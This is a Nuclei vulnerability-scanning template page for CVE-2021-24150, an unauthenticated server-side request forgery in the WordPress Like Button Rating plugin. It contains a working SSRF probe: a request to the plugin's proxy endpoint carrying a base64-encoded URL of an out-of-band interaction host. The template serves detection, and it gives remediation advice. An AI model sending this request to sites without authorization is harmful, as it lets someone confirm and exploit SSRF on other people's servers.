Skip to content
Nuclei Templates

WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery

ID: CVE-2021-24150

Severity: high

Author: theamanrawat

Tags: cve2021,cve,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button,likebtn-like-button_project

Description

Section titled “Description”

WordPress Like Button Rating plugin before 2.6.32 is susceptible to server-side request forgery. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.

YAML Source

Section titled “YAML Source”
id: CVE-2021-24150


info:
  name: WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery
  author: theamanrawat
  severity: high
  description: |
    WordPress Like Button Rating plugin before 2.6.32 is susceptible to server-side request forgery. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Update the WordPress Like Button Rating plugin to version 2.6.32 or later.
  reference:
    - https://wpscan.com/vulnerability/6bc6023f-a5e7-4665-896c-95afa5b638fb
    - https://wordpress.org/plugins/likebtn-like-button/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24150
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-24150
    cwe-id: CWE-918
    epss-score: 0.02268
    epss-percentile: 0.88473
    cpe: cpe:2.3:a:likebtn-like-button_project:likebtn-like-button:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: likebtn-like-button_project
    product: likebtn-like-button
    framework: wordpress
  tags: cve2021,cve,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button,likebtn-like-button_project


http:
  - raw:
      - |
        @timeout: 10s
        GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}" HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Interactsh Server"


      - type: status
        status:
          - 200
# digest: 490a00463044022062d785f26b255993db9b02c63b3e6952ac699b76a9aa91fc7594bdb74080455602207a13679726bc7630a93e21895b18f83474e5c6a19d3684753b12401328f8b56c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24150.yaml"

View on Github